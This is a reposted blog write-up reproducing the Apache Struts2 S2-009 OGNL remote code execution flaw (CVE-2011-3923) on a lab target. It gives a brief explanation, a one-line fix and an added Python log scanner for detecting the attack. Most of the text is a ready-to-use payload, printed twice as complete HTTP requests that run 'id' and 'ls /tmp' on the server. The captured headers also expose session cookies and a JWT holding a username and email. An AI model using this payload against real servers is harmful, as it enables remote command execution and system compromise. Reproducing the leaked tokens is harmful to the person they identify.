Struts S2-009 code execution (CVE-2011-3923): reproduction


All articles are for security research and learning only; you bear the consequences yourself!


0x01 Vulnerability description

This vulnerability belongs to the same family as S2-003 and S2-005. Struts2 fixed S2-003 by forbidding the # character, so S2-005 bypassed that by using the encodings \u0023 or \43; Struts2 then fixed S2-005 by forbidding \ and other special characters, so users could no longer submit a backslash. However, if the current action accepts some parameter example, that parameter enters the OGNL context. We can therefore place the OGNL expression in the example parameter and execute it with /HelloWorld.action?example=&(example)('xxx')=1, thereby bypassing the official defence against special characters such as # and \.

0x02 Affected versions

2.1.0 - 2.3.1.1

0x03 Reproduction

Vulnerable endpoint

/ajax/example5.action

Payload

/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

(1) Open the lab target.
(2) Open the vulnerable endpoint.
(3) Intercept the request and send the following request:

GET /ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1
Host: vulfocus.fofa.so:38193
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636015562,1636016317,1636076952,1636084136; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1636095790; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM2MTcwNDk1LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.jTl3hF779uO3OuYHGI5kORhHsDhkY2ZWvATJUG5gr_Q; JSESSIONID=FF0793D77BEA63813162E90223CEEB91; PHPSESSID=n7oiu58u8du9ussoeu0nl74334
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0



The same request with ls /tmp in place of id:

GET /ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ls%20/tmp%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1
Host: vulfocus.fofa.so:38193
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636015562,1636016317,1636076952,1636084136; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1636095790; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM2MTcwNDk1LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.jTl3hF779uO3OuYHGI5kORhHsDhkY2ZWvATJUG5gr_Q; JSESSIONID=FF0793D77BEA63813162E90223CEEB91; PHPSESSID=n7oiu58u8du9ussoeu0nl74334
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0



0x04 Remediation

Upgrade Struts to a version outside the affected range.
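As an added example (not from the original post), a small Python access-log scanner that flags requests carrying the S2-009 shape shown above: an OGNL expression in a parameter value plus a parameter name of the form z[(name)('meh')] that makes Struts evaluate it, including the double-encoded variant. The log lines are constructed; the marker strings and class names are taken from the payload in this post.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# A parameter NAME shaped like (name)('meh') or z[(name)('meh')] is the S2-009 signature:
# Struts evaluates the parenthesised name as OGNL, which in turn evaluates the value of
# the parameter it refers to (the "name" parameter in the payload above).
PARAM_NAME_EVAL = re.compile(r"\(\s*\w+\s*\)\s*\(\s*['\"]?\w*['\"]?\s*\)")
# Static method access such as @java.lang.Runtime@getRuntime()
STATIC_ACCESS = re.compile(r"@[\w.]+@\w+")
OGNL_MARKERS = ("#context", "#_memberAccess", "denyMethodExecution", "allowStaticMethodAccess")
REQUEST_LINE = re.compile(r"(?:GET|POST|PUT)\s+(\S+)\s+HTTP/")


def inspect_query(query):
    """Return findings for one raw (still percent-encoded) query string."""
    findings = []
    # parse_qsl decodes once; decoding each part once more catches %2527-style double encoding.
    for raw_name, raw_value in parse_qsl(query, keep_blank_values=True):
        name, value = unquote_plus(raw_name), unquote_plus(raw_value)
        if PARAM_NAME_EVAL.search(name):
            findings.append(f"OGNL evaluation in parameter name: {name}")
        for text in (name, value):
            if STATIC_ACCESS.search(text) or any(m in text for m in OGNL_MARKERS):
                findings.append(f"OGNL context/static access in parameter '{name}'")
                break
    return findings


def scan_log(lines):
    """Return (line_number, findings) for every log line whose request target looks like S2-009."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        findings = inspect_query(urlsplit(m.group(1)).query)
        if findings:
            hits.append((lineno, findings))
    return hits


# Constructed sample lines: one benign request and two encodings of an S2-009 probe
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Nov/2021:10:00:01 +0800] "GET /ajax/example5.action?age=12&name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [06/Nov/2021:10:00:07 +0800] "GET /ajax/example5.action?age=12313&name=(%23_memberAccess[%22allowStaticMethodAccess%22]=true)(meh)&z[(name)(%27meh%27)] HTTP/1.1" 200 88',
    '10.0.0.9 - - [06/Nov/2021:10:00:09 +0800] "GET /ajax/example5.action?name=x&z%5B(name)(%2527meh%2527)%5D= HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG):
        print(lineno, findings)
```

Run it over a real Apache or Nginx access log by replacing SAMPLE_LOG with the file's lines; only the request target is inspected, so the rest of the log format does not matter.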


Reposted from blog.csdn.net/YouthBelief/article/details/121163766